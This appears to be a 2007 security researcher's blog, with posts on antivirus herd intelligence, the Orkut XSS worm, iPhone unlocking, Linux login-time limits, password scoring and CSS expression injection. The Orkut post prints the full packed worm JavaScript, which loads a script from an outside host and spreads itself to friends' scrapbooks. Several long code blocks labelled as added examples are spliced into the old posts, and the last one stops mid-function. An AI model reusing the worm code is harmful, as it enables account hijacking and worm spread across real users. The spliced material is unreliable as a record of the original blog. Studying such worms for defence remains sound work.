Monday, December 31, 2007

Herd Intelligence Against Internet Malware

Hi folks,
today I wanna point out this paper on InfoWorld on Herd Intelligence. As everybody knows, polymorphic worms can easily change from machine to machine, making life hard for the Anti-Virus companies. Antivirus and Anti-Malware products are often based on signature "finger-prints", and for that reason it's still easy to bypass them. In this paper the author describes how the companies want to solve this problem using Herd Intelligence. Who is the Herd? Of course, we are!! Yep,.., companies are thinking of using client computers in order to grab new malware, new virus signatures and so on....


The idea is simple, according to the analyst. If attackers are going to attempt to create different attacks for nearly every individual user, then security software vendors must use their customers' machines as their eyes and ears for discovering and addressing those variants. (from site)


Well, this is an interesting (possible) solution to the problem, but what I still can't understand is why companies are fixed on fingerprint technologies. Using fingerprints means running after malware, not preventing it and certainly not blocking it. What I keep asking myself is: why don't Antivirus companies use a behavioral detection technique? There is a lot of research on dynamic malware detection based on API sequences and on data flows which, if well implemented and well planned, can really improve malware prevention. Why don't companies invest in this "paradigm shift" rather than turning the Client Herd computers into guinea-pigs?
I'm pretty sure it would be cheaper, because building Herd Clients means writing more client-side agents as well as rewriting the detection software. Moreover, building a herd means teaching people to understand it, teaching computer technicians to repair the new systems, trying to persuade people that the new agent sends only malware information and not sensitive information, and so on.......
Another problem comes from the trusted computing field.... How can we know that the new agents installed on our machines are safe? Again, how can we know that these programs don't send sensitive and/or private information to the Antivirus company? How can we assume that the Antivirus company has good intentions?
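To make the argument above concrete, here is an added toy comparison (my own code, not from the InfoWorld article or this post) between fingerprint matching and behavioral matching on API call sequences. The two "variants", their hash, the API traces and the behavioral rule are all constructed for the example.

```javascript
// Added example, not from the InfoWorld article or the post: a toy comparison of
// signature (fingerprint) matching with behavioral matching on API call sequences.
// Samples, hashes and the behavioral rule below are all constructed.

// FNV-1a 32-bit over a byte array: stands in for the hash an AV signature would use.
function fnv1a(bytes) {
  let h = 0x811c9dc5;
  for (const b of bytes) {
    h ^= b;
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h >>> 0;
}

// Two constructed "variants": same behaviour, one byte differs (the way a
// polymorphic engine re-encodes the body), so the fingerprint no longer matches.
const VARIANT_A = Uint8Array.from([0x4d, 0x5a, 0x90, 0x00, 0x03, 0x11, 0x22, 0x33]);
const VARIANT_B = Uint8Array.from([0x4d, 0x5a, 0x90, 0x00, 0x03, 0x11, 0x22, 0x34]);
const KNOWN_BAD_HASHES = new Set([fnv1a(VARIANT_A)]);

// Signature check: exact hash lookup, defeated by a single changed byte.
function signatureMatch(bytes) {
  return KNOWN_BAD_HASHES.has(fnv1a(bytes));
}

// Constructed API call traces of the kind a sandbox would record.
const TRACE_A = ['CreateFileW', 'WriteFile', 'RegSetValueExW', 'CreateProcessW', 'connect', 'send'];
const TRACE_B = ['GetTickCount', 'CreateFileW', 'Sleep', 'WriteFile', 'RegSetValueExW',
  'CreateProcessW', 'connect', 'send'];
const TRACE_BENIGN = ['CreateFileW', 'ReadFile', 'CloseHandle'];

// Behavioural rule: an ordered subsequence (gaps allowed) of API calls that
// together mean "write a file, persist via the registry, run it, phone home".
const DROPPER_RULE = ['WriteFile', 'RegSetValueExW', 'CreateProcessW', 'connect'];

// True when every rule step occurs in the trace in order, with any calls between.
// Inserted junk calls (Sleep, GetTickCount) do not break the match.
function behaviorMatch(trace, rule) {
  let i = 0;
  for (const call of trace) {
    if (call === rule[i]) i++;
  }
  return i === rule.length;
}

console.log('signature A/B:', signatureMatch(VARIANT_A), signatureMatch(VARIANT_B));
console.log('behaviour A/B/benign:', behaviorMatch(TRACE_A, DROPPER_RULE),
  behaviorMatch(TRACE_B, DROPPER_RULE), behaviorMatch(TRACE_BENIGN, DROPPER_RULE));
```

Variant B slips past the fingerprint while still matching the behavioral rule; the price of the behavioral approach, which the post does not discuss, is that the rule has to be tuned so that legitimate installers do not trip it.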

If we take as an example the Diebold company and its Voting Machines, it's pretty easy to understand that these assumptions are really too strong in the Internet era.

Thursday, December 27, 2007

CourtTV: Tiger Team

Well, another nice saga from CourtTV. For those who know some Tiger Teams it will be really FUNNY; for those who don't know any Tiger Team it'll be a very interesting video. In any case, enjoy watching.



Here are the "Tiger Team 101" episodes.
First
Second
Third
Fourth

Saturday, December 22, 2007

XMAS: working with 20% of overflow ... ... ... ... ... ...

I know, it's Xmas. I should stop working and stay with my family or.. something like that. Well, I really wanna stop but I'm still working on 3 different papers, whose deadlines are at the end of January and February. It seems reasonable to stop blogging just for some days, but actually I don't know if I'll resist writing some news on my blog. Anyway, tomorrow I wanna point out a very interesting post by Ann in her blog. Here you can find the original post (MSI Script vs Windows Security), where Ann describes how to:

1) change the values of Windows system registry keys;
2) run a low-level system tool.


By running some script (see the original post) during the installation phase it's possible to get higher permissions. The main problem seems to be in msiexec, which gets elevated privileges during the installation phase.

If you try to do this explicitly as a regular user (or without elevated privs on Vista), Windows will politely tell you that you can't. But if you execute the following MSI script during an installation (running the installation as a regular user), msiexec gets elevated privileges, and can do whatever you want. Here's an example silently disabling UAC during an installation by launching regedit from cmd. (This is run in Wise via 'Execute Program from Destination', Working directory: SystemFolder):

Another interesting project that I've seen during the past days is PhishTank. It's a website where dedicated volunteers submit URLs of suspected phishing websites and vote on whether the submissions are valid. The idea behind PhishTank is to bring together the expertise and enthusiasm of people across the Internet to fight phishing attacks. The more people participate, the larger the crowd, the more robust it should be against errors and perhaps even manipulation by attackers.
I'm interested in this project for several reasons, but one of the most important reasons that led me to it was reading this paper by the University of Cambridge. Tyler Moore and Richard Clayton describe why and how this (great) service is vulnerable. I was amazed during the reading because I can't understand how a pretty important conference like Financial Crypto can publish this kind of (easy and not innovative) work. Maybe my opinion of Financial Crypto is wrong.

Friday, December 21, 2007

I've read it online so it's true.

How many times do we hear:
"I don't agree with you, I've read something online that proves the opposite" or "I'm sure, I've read it online!".
But are you sure that everything you read online is true?



Well, now we are sure ! :-)
via Christofer

Thursday, December 20, 2007

Orkut was hacked !

It's amazing to see that the main problems are always the same problems.... Anyway, another XSS Worm, but "today" it hits Google!




Orkut is Google’s version of social networking. It was big for a while, but I think everyone bailed in favor of the more open MySpace and Facebook’s of the world. It’s still widely used by the Portuguese population though.

From different sources:


On Orkut, you can use arbitrary HTML when scrapping your friends. Rodrigo's worm exploited this 'feature'. What it did was to start with scrapping a malicious flash file. Just viewing this scrap causes the flash object to load which in turn loads our favourite virus.js file. The Javascript code in that file first joins you in the community called Infectatos pelo Virus do Orkut (in English - Infected by the Orkut Virus) and then sends the same flash file as a scrap to as many people in your friends list as possible. So when each of your friends sees their Scrapbook, they in turn start propagating the worm to their friends, etc.



On November 8th 2006 Rajesh Sethumadhavan discovered a type 2 vulnerability in the social network site Orkut which would make it possible for orkut members to inject HTML and JavaScript into their profile. Rodrigo Lacerda used this vulnerability to create a cookie stealing script known as the Orkut Cookie Exploit which was injected into the orkut profiles of the attacking member(s). By merely viewing these profiles unsuspecting targets had the communities they owned transferred to a fake account of the attacker. On December 12th Orkut had fixed the vulnerability.


The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js

function $(p,a,c,k,e,d) {
e=function(c) {
return(c<35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
while(c--){d[e(c)]=k[c]||e(c)}
k=[function(e){return d[e]}];
e=function(){return'\\w+'};
c=1
};
while(c--){
if(k[c]){
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
}
}
return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};
5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>[1j]25 "+i F()+"[/1j]<1k/><13 1o="\\" 2a="\\" 2e="\\" r="8.1n(\'r\');r.1o="\'o://1p.2k.p/2n/1p/1s.1t\';8.D(\'1w\')[0].1f(r);19(\'\\" 1c="\\" 1e="\\">";
5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();
3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");
3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};
6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();
',62,150,'|||xml||var|if|function|document|domain|send|return|path|wDate||select|name|begin|new|index|
www|dc|expires|encodeURIComponent|http|com|POST|script|wormdoorkut|div|end|getCookie|orkut||cookie|aspx
|prefix|createXMLHttpRequest|true|getElementsByTagName|SIG|Date|loadFriends|POST_TOKEN|scrapText|null|
signature|catch|length|selectedList|item|value|application|open|indexOf|cmm_join|secure|sendScrap|setCookie|
readyState|onreadystatechange|try|Content|86400|setRequestHeader|embed|ActiveXObject|Action|else|form|
getElementById|escape|status|urlencoded|200|setTime|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|
createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|GMT|go|GET|Compose|width|innerHTML|height|option|
setAttribute|id|submit|style|display|none|removeChild|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|
history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|raw|LoL|Msxml2|type|Microsoft|shockwave|flash|
wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera
|XMLHttpRequest|substring|virusdoorkut|CGI|Page'.split('|'),0,{}),1
);
author="Rodrigo Lacerda"



Here is the complete decoded script.
And here the original advisory.
And of course, if you try to search for something on Google about this vulnerability, you'll be redirected right here: the always updated Google malware list.

Tuesday, December 18, 2007

Yet Funny Stuff

Another funny picture, quite off-topic but so cute!

In my mail box too.



The card.zip attachment contains card.scr (md5: 536BFC077FBAD247FA5EA67ADF1DCA7D), which we detect as
Trojan-Downloader.Win32.Agent.gbu.

Monday, December 17, 2007

Software upgrading.. .. .. ..

It's time to get up and see what new software has been made. It's a long time since I focused my attention on the new software generation. During these days I decided to analyze two different programs signed up from the MacApp community.
Two more useful and cheap Mac programs to organize your computer.
The first one has been named Hazel 2 by its designers; it's a Mac cleaner, while the second one is a Time Machine configuration tool, named TimeMachineScheduler, useful to manage advanced Time Machine capabilities.




From the web site (click on the above picture):

Hazel watches whatever folders you tell it to, automatically organizing your files according to the rules you create. It features a rule interface similar to that of Apple Mail so you should feel right at home. Have Hazel move files around based on name, date, type, what site/email address it came from (Safari and Mail only) and much more. Automatically put your music in your Music folder, movies in Movies. Keep your downloads off the desktop and put them where they are supposed to be. Hazel can open, archive, set color labels and add Spotlight comments. And in Hazel 2, you can now have Hazel rename your files or sort them into subfolders based on name, date or whatever combination of attributes you choose. Hazel 2 gives you the ability to create even more powerful workflows than ever before. When you throw away applications, they can leave behind support files that never get cleaned up. With Hazel 2's App Sweep, Hazel will detect when you throw applications away, search for its support files and offer to throw those away as well. Uninstalling applications is integrated with your Trash so you don't even have to think about it. Hazel features new actions to import your files into iPhoto or iTunes. Keep your media in line. Add to your library or to a specific playlist or photo album. Improved Spotlight integration allows you to use any Spotlight attribute in your rules. Filter files based on Spotlight attributes or use them in conjunction with the new renaming and sorting actions. Sort your photos by aperture or shutter speed or rename your music files with artist, album and year. Make your metadata work for you. Hazel has options to clean out those pesky unneeded files that clutter your folders, getting rid of incomplete and duplicate downloads for you. And, of course, you can set up whatever rules you want to automatically throw files away. You can have Hazel manage your Trash. Select from different options to keep your Trash in check. And for extra security, Hazel can also shred files like Finder's "Secure Empty Trash" option. Hazel's rules can trigger Automator workflows, AppleScripts and shell scripts. Hazel will run whatever you throw at it, making it easy for you to integrate into your workflow.








From the web site (click on the above picture):

In Mac OS X 10.5 Leopard Apple has introduced Time Machine, a very convenient way to make backups. Unfortunately the backup interval is preset constantly to one hour. Apple uses a launchd daemon to control the timing, but changing the interval value in the launchd.plist file has no effect.
TimeMachineScheduler disables the automatic backup function of Time Machine and installs its own launchd agent. As the agent is located in the main library, the administrator password is required for all (writing) operations. Except for disabling Time Machine, no further system files and preferences will be touched by TimeMachineScheduler.
There are (still) some access privilege problems in OS X 10.5 Leopard if the operating system has been updated, migrated or installed with the archive & install option. TimeMachineScheduler takes care of all files and sets owner, group and the privileges to the proper default values. You can install and uninstall the agent as well as only load and unload it to disable making backups temporarily. The interval can be set between 1 and 12 hours, and the agent can be set to run additionally at load, which means also at startup and login.
You can press a button to run a backup immediately. The status of the scheduler will be displayed. During a running backup the control elements are disabled. All actions will be written into a log file (~/Library/Logs/TimeMachineScheduler.log). TimeMachineScheduler is not required to run permanently; the scheduler works independently in the background. If you want to revert to the original settings of Time Machine, just uninstall the scheduler and enable Time Machine in its Preference Pane.
For the worst case (which will never happen) an "emergency" uninstaller is included.

I've tried these programs for just a few days, but I can say that (in particular the second one) they are really useful to manage your big pile of folders, files and whatever else. I'm pretty sad that Hazel is still under a commercial license, but it works really fine.

Saturday, December 15, 2007

News on iPhone

Hi folks,
it's been a long time since I spoke about the iPhone cracking status. Actually I've got a 1.1.1 firmware and I'm very happy not to change it because it's still working well. Anyway, what's happening in the iPhone hacking community? Are they still researching a solution? Yes and no... something has happened.




First of all, two theoretical exploits have been found on the new bootloader 4.6!!
And you know what that means! The 1.1.2 OTB software unlock is coming very soon! Another important piece of news comes from the iPhone Dev Team, who opened up their software. However, there is no solution yet to break the SIM lock and put in any SIM card. Actually the community has just discovered the NCK (Unlock Code), but it's pretty hard to break with normal brute-force techniques.

The NCK code is transferred during activation of your iPhone.
A plist file is created on the iPhone, and then sent to the Apple webserver.
If the iPhone is unlocked in Apple's database, it will reply with the unlock code.
They have managed to send an activation request to the Apple webserver and catch the NCK.


It looks like this: "UnlockCode" = "NO=111111111111111&";

The '1's are to be replaced with digits, so I guess that the unlock code is 15 digits long.
Way too long for a brute-force attack... They doubt the unlock code has any correlation with any device ids; it is more likely that Apple has it stored in a database for every single iPhone.
If you can't wait for the software solution, which seems to be coming very soon, there is an easy-to-use and intuitive hardware solution by TurboSIM for $59 that works fine!

The reverse continues.

Thursday, December 13, 2007

Elevator And Peter G. Neumann

Obviously you may wonder about the link between the absolute guru Peter G. Neumann and the elevator of my Miami Beach hotel. Well, it makes perfect sense, let me say.......

It was a sunny and really hot day in Miami Beach (Florida) during the 23rd ACSAC conference. It was the first day of the conference; I was excited to be staying on the 17th floor of a very very high hotel in front of the ocean. I took the elevator down to the "East Ocean" room in order to attend the first talk. Inside the big elevator an old man looked at me with a strange smile and asked me:



Hi, how's it going


He looked at my name badge and said again:


Marco, nice to meet you. I'm Peter Neumann


I was astonished, paralyzed; I couldn't imagine that he was the "true" Neumann, and so I said:


Hello Peter, my name is Marco from University of Bologna


He smiled, like a person who knew that I hadn't recognized a famous personality like him....
Only after a few seconds did I realize that it was truly him. Perplexed, I followed him and said:


Sorry I didn't recognize you


I tried to improvise a few minutes of conversation and at the end I asked for a little autograph on my proceedings. Now I have it.
I'm really proud to show it on my blog.


Tuesday, December 11, 2007

During Some Free Time

Sometimes I can't understand why people don't want to read normal and easy papers, but prefer asking (in this case me) a lot of obvious things. During these days I received some mails asking how to change system administrator properties. In particular, some of my "old" students wanted to know how to set login time restrictions on user accounts using Linux. Well, just 2 minutes of Google research and I found lots of great papers on this problem. Anyway, the easiest way to restrict login times on user accounts is using pam_time.so by Andrew G. Morgan. Keep in mind that the main useful file is /etc/security/time.conf.

Here is an easy example of the line format:

Service;ttys;users;time

To limit ssh access from 23:00 to 08:00 -favorite hackers' time- you can write the following line:

sshd;*;*;!Al2300-0800

The `!` negates the time range and `Al` stands for all days of the week, so `!Al2300-0800` means any time except 23:00-08:00, every day.

Another great example could be the following one:

login;*;!root;!Al1600-2000

It permits everyone except root, from 4PM to 8PM, every day.
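To see how pam_time reads these lines, here is an added evaluator (my own code, not part of the post or of pam_time) for the subset of the time.conf syntax used above: `*` wildcards, `!` negation of a user list or of a time range, the day codes Mo Tu We Th Fr Sa Su Wk Wd Al, and HHMM-HHMM ranges that may wrap past midnight. As in pam_time, a rule whose service, tty and user fields match is a test: if its time test fails, the login is denied; a `!` in front of the range inverts the test, so `!Al2300-0800` denies only inside 23:00-08:00. The `|` and `&` list operators of the real module are not implemented, and the sample rules and timestamps are constructed.

```javascript
// Added example, not from the post or from pam_time itself: a small evaluator
// for /etc/security/time.conf entries of the form services;ttys;users;times.
// Supports "*" wildcards, "!" negation of a field or time range, the pam_time
// day codes and HHMM-HHMM ranges that wrap past midnight. "|" and "&" inside
// lists are not supported here.

const DAY_CODES = {
  Su: [0], Mo: [1], Tu: [2], We: [3], Th: [4], Fr: [5], Sa: [6],
  Wk: [1, 2, 3, 4, 5], Wd: [0, 6], Al: [0, 1, 2, 3, 4, 5, 6],
};

// A list field such as "*", "root" or "!root". A leading "!" inverts the match.
function listMatches(field, value) {
  const negate = field.startsWith('!');
  const body = negate ? field.slice(1) : field;
  const hit = body === '*' || body === value;
  return negate ? !hit : hit;
}

// Parse "Al2300-0800" into { days: Set<weekday>, start, end } with times in minutes.
function parseTimeRange(spec) {
  const m = /^((?:[A-Z][a-z])+)(\d{4})-(\d{4})$/.exec(spec);
  if (!m) throw new Error(`bad time spec: ${spec}`);
  const days = new Set();
  for (const code of m[1].match(/[A-Z][a-z]/g)) {
    if (!DAY_CODES[code]) throw new Error(`bad day code: ${code}`);
    DAY_CODES[code].forEach(d => days.add(d));
  }
  const toMin = s => Number(s.slice(0, 2)) * 60 + Number(s.slice(2));
  return { days, start: toMin(m[2]), end: toMin(m[3]) };
}

// True when the weekday/time falls inside the range; 2300-0800 wraps midnight.
function inRange(range, weekday, minutes) {
  if (!range.days.has(weekday)) return false;
  if (range.start <= range.end) return minutes >= range.start && minutes < range.end;
  return minutes >= range.start || minutes < range.end;
}

// Returns true when the login is allowed under the given time.conf text.
// `when` is a Date; only its local weekday and time of day are used.
function loginAllowed(rules, service, tty, user, when) {
  const weekday = when.getDay();
  const minutes = when.getHours() * 60 + when.getMinutes();
  for (const line of rules.split('\n')) {
    const trimmed = line.trim();
    if (!trimmed || trimmed.startsWith('#')) continue;
    const [svc, ttys, users, times] = trimmed.split(';').map(s => s.trim());
    if (!listMatches(svc, service) || !listMatches(ttys, tty) || !listMatches(users, user)) continue;
    const negate = times.startsWith('!');
    const range = parseTimeRange(negate ? times.slice(1) : times);
    const hit = inRange(range, weekday, minutes);
    // The rule applies: a failed time test denies the login.
    if (negate ? hit : !hit) return false;
  }
  return true; // no applicable rule denied it
}

// The two entries from the post, as constructed sample configuration.
const SAMPLE_RULES = `
# services;ttys;users;times
sshd;*;*;!Al2300-0800
login;*;!root;!Al1600-2000
`;

// Fixed local timestamps (Tue 11 Dec 2007) so results do not depend on the clock.
const at = (h, m) => new Date(2007, 11, 11, h, m);

console.log('sshd 23:30', loginAllowed(SAMPLE_RULES, 'sshd', 'pts/0', 'alice', at(23, 30)));
console.log('sshd 12:00', loginAllowed(SAMPLE_RULES, 'sshd', 'pts/0', 'alice', at(12, 0)));
console.log('login bob 17:00', loginAllowed(SAMPLE_RULES, 'login', 'tty1', 'bob', at(17, 0)));
console.log('login root 17:00', loginAllowed(SAMPLE_RULES, 'login', 'tty1', 'root', at(17, 0)));
```

Running it shows the asymmetry that matters when you write these rules: the `!root` user list means the second entry never applies to root, while for everybody else the `!Al1600-2000` test fails between 16:00 and 20:00 and the login is refused.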

If I can suggest something to you: remember that the initial hardening phase is one of the most important procedures to increase the security of your machines. Be careful.

Friday, December 7, 2007

Annual Computer Security Applications Conference.

Hi folks,
I'm going to ACSAC next week.



I'll be in Miami Beach and Orlando, in order to see the shuttle launch! Maybe I won't be able to update my blog corner, but if I find some free time I'll discuss what I see. I've never been to ACSAC, so I'm pretty curious to attend this event. Thank you very much to Marco Prandini for involving me in this activity!!

Wednesday, December 5, 2007

California Electronic Voting.

My super boss said:


Electronic voting systems used throughout California still aren't good enough to be trusted with the state's elections, Secretary of State Debra Bowen said Saturday.
While Bowen has been putting tough restrictions and new security requirements on the use of the touch screen machines, she admitted having doubts as to whether the electronic voting systems will ever meet the standards she believes are needed in California.


And I thought ... ... ... ... I know, I know ;-D. Anyway, it's an interesting article on the importance of Voting Machines in the USA.

Tuesday, December 4, 2007

Mac Book Pro: the fastest Vista Notebook

PC World says that the MacBook Pro is the fastest notebook running Microsoft Vista!
It's pretty amazing news, I know,.., but if you consider that Apple has not hesitated to publish this new video, it becomes really amazing!




I like the Apple commercial videos; one of my favorites was "Security", but this one is one of the funniest I've ever seen!
Thanks Apple for these laughs!

Monday, December 3, 2007

SANS Top 20

Every year SANS publishes the top twenty vulnerabilities of the year, classified in different categories. This year:

Client-side Vulnerabilities in:
C1. Web Browsers
C2. Office Software
C3. Email Clients
C4. Media Players

Server-side Vulnerabilities in:
S1. Web Applications
S2. Windows Services
S3. Unix and Mac OS Services
S4. Backup Software
S5. Anti-virus Software
S6. Management Servers
S7. Database Software

Security Policy and Personnel:
H1. Excessive User Rights and Unauthorized Devices
H2. Phishing/Spear Phishing
H3. Unencrypted Laptops and Removable Media

Application Abuse:
A1. Instant Messaging
A2. Peer-to-Peer Programs

Network Devices:
N1. VoIP Servers and Phones

Zero Day Attacks:
Z1. Zero Day Attacks


In my opinion nothing has happened; for many years the security landscape hasn't changed. Client-side vulnerabilities are most often browser vulnerabilities, because browsers like Firefox and IE are the most used clients. On the other hand, Web Applications are growing and not every developer is careful about security issues, so it's reasonable that they are still first among the Server-Side Vulnerabilities. But..., actually I don't agree with the positions of H1 and H2. My personal experience in security says that phishing is one of the most important security problems of the current era. Preventing phishing means addressing both technical security aspects and social aspects; on the first, lots of groups are working with great results, but on the social aspects the evangelist community is still behind. For this reason phishing is one of the most important and most used attacks. H1 is of course a really important problem, but one that has been fought for much longer in security history; I believe lots of steps have already been taken in this particular direction, and for this reason it is not comparable with the more recent phishing.

Friday, November 30, 2007

Say Goodbye to robots.txt

Yesterday the Automated Content Access Protocol (ACAP) was born.

It’s hard for anyone to make content available for access and use on the network without any rules…
It’s hard to follow rules if you don’t know what they are…
It’s hard to learn how to read and understand rules if you are a machine…


Search engines bow to website owners. Is this a new Wide Web era? I think so, and I think it should be very interesting stuff for web security. Hiding whatever you want is not an easy job if you're online. Often Google, Yahoo and others grab your secret contents, allowing attackers to read and play with them. Robots.txt is still not a standard but just an unofficial convention followed by some web spiders; agreeing on a new standard is a "must", even to prevent search-engine attacks. I totally agree with the ACAP project!
Anyway, what will happen to your web site? Just a few but important changes:

1) changes to your 'robots.txt' file
2) changes to content resources

If you already have a robots.txt, here is an easy-to-use converter plug-in able to translate your old robots.txt into the ACAP standard. However, if you want to use the whole power of ACAP you should read the Technical Guide, ... not that long. Of course, don't forget to publish the logo on your page :-D

Thursday, November 29, 2007

Really Funny.

When the art captures the truth :-D



:-)

Easy Password Checker.

Hi Folks,
today I wanna point out an example of a Password Checker that I've found here, via Schneier. It's a pretty easy example of how to use a "score-based" heuristic without any recursion. Starting from 0 points, your password can only increase its score by passing tests, up to the maximum tally of 6.
Here is an example: try it with your password! (It's JavaScript)



The main JavaScript "score" function is available here:



Nice, don't you think ?
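Since the checker itself is only linked, here is an added one written in the same spirit (my own code, not the script from the linked page): the password starts at 0 and gains one point per test passed, up to 6. The six tests, the strength labels and the tiny deny list of common passwords are my own choices and are constructed for the example.

```javascript
// Added example, not the checker from the linked page: a score-based password
// checker. Score starts at 0 and gains one point for every test passed, max 6.
// The tests and the small deny list are my own choices.

const COMMON_PASSWORDS = new Set(['password', '123456', 'qwerty', 'letmein', 'iloveyou', 'abc123']);

// Each test is a pure predicate on the password string; no recursion anywhere,
// the score is simply how many predicates hold.
const TESTS = [
  { name: 'at least 8 characters', test: p => p.length >= 8 },
  { name: 'at least 12 characters', test: p => p.length >= 12 },
  { name: 'mixed lowercase and uppercase', test: p => /[a-z]/.test(p) && /[A-Z]/.test(p) },
  { name: 'contains a digit', test: p => /\d/.test(p) },
  { name: 'contains a symbol', test: p => /[^A-Za-z0-9]/.test(p) },
  {
    name: 'not a common password (also with trailing digits removed)',
    test: p => {
      const lower = p.toLowerCase();
      return !COMMON_PASSWORDS.has(lower) && !COMMON_PASSWORDS.has(lower.replace(/\d+$/, ''));
    },
  },
];

// Returns the score, the names of the tests passed and the maximum possible score.
function scorePassword(password) {
  if (!password) return { score: 0, passed: [], max: TESTS.length };
  const passed = TESTS.filter(t => t.test(password)).map(t => t.name);
  return { score: passed.length, passed, max: TESTS.length };
}

// Human-readable label per score 0..6.
const LABELS = ['very weak', 'very weak', 'weak', 'fair', 'good', 'strong', 'very strong'];

function strengthLabel(password) {
  return LABELS[scorePassword(password).score];
}

for (const p of ['password', 'Password123', 'Tr0ub4dor&3', 'correct horse battery staple']) {
  const r = scorePassword(p);
  console.log(`${p}: ${r.score}/${r.max} (${strengthLabel(p)})`);
}
```

The last test is the one that makes the difference between a checker and a toy: a long, mixed-case "Password123" still loses the point because its base word is on the deny list, which is the check most score-based meters forget.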

Tuesday, November 27, 2007

Jumping CAPTCHA.

Here is one of the coolest "on the fly" tools that I've ever seen.
Try to load the page many times and try to count the false positives: there are really few!
This easy PHP page breaks the CAPTCHA digits thanks to an easy statistical analysis of color frequency per digit. Actually it's quite crude, but it runs well and it does the trick!!!



The main idea is the following:


Here you can find the entire source code.
Via this site.

The Day The Routers Died...



Via Joerg Moellenkamp

Monday, November 26, 2007

IPod Touch Audio Line-In Discovered

Hi Folks,
another big piece of news from ipodtouchfans: a new Audio Line Input has been discovered, which allows many applications to run and maybe also VoIP applications. From touchmods.blog.com, the first amplifier schematic:
 

A little description:
- 13, 26 and 29 are the pin indices of the Dock Connector.
- The resistor above the mic could be between 1 and 5 kOhm, depending on your mic.
- The capacitors C1 and C2 should be above 1 microfarad, any value is ok.

The picture quality is not the best, as it was made in a fast way on my N770 using the amazing Xournal note taker.
Anyway, what is important, in case you plan to build everything inside the Dock Connector, you will need to make a PCB that is all-in-all less than 3.5x 8x 16mm, as the internal height of the Dock Connector is 3.5mm. Not to mention that the position of the PCB will be also restricted (centralized) by the pins inside the plug. A smart solution would be to leave the PCB out and to put the resistors directly onto the legs of the IC. Dock connector available here


Read more here, here, here, here and here.

XSS CSS INJECTION on IE7 and Firefox

Hi folks,
today I wanna present a great work on XSS CSS injection. Following the amazing work of Martin, style="xx:expression((window.r!=1)? ......, Gareth wrote a more complete example of an injection scenario. Here it is!



That, translated from hexadecimal, becomes:



It's still incredible to see code executing even when it has been converted into entities with htmlspecialchars. Yep, incredible but true! Someone is saying you should never allow users to insert HTML code in your pages, but I don't think so; it's difficult to give something and then take it back, it's difficult to say STOP HTML to users now, when users are living on HTML. Maybe security staff must learn from this "other example" and work hard to prevent other similar stuff.
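Both this post and the Orkut worm post above come down to the same defensive question: how to let users write some HTML without letting them write `<embed>` tags, event handlers or `expression()` styles. The following is an added allow-list sanitizer (my own code, not Gareth's, Martin's or Orkut's) that shows the two ingredients the htmlspecialchars approach misses: keep only known-good tags and attributes instead of escaping everything, and, for any CSS or URL value you do keep, decode HTML entities and CSS backslash escapes before checking it, so `e\78pression(` or `&#101;xpression(` is judged as `expression(`. The tag and attribute allow lists, and the sample fragments, are constructed for a profile-text use case.

```javascript
// Added example, not from either post: an allow-list sanitizer for user-supplied
// HTML fragments plus a style-value check that normalises encodings first.
// Allow lists below are constructed for a "profile text" use case.

const ALLOWED_TAGS = new Set(['b', 'i', 'em', 'strong', 'p', 'br', 'a']);
const ALLOWED_ATTRS = { a: new Set(['href', 'title']) };

// Code points above U+10FFFF cannot be decoded; substitute U+FFFD instead of throwing.
const cp = n => (n > 0x10ffff ? '\ufffd' : String.fromCodePoint(n));

function escapeText(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// Decode numeric and the common named entities the way a browser does before
// the value reaches its CSS or URL parser.
function decodeEntities(s) {
  const named = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(Number(d)))
    .replace(/&(lt|gt|amp|quot|apos);/gi, (_, n) => named[n.toLowerCase()]);
}

// Decode CSS backslash escapes ("\78" -> "x"), drop comments and collapse
// whitespace, so "e\78pression(" and "expression(" compare equal.
function normalizeCss(value) {
  return decodeEntities(value)
    .replace(/\/\*[\s\S]*?\*\//g, '')
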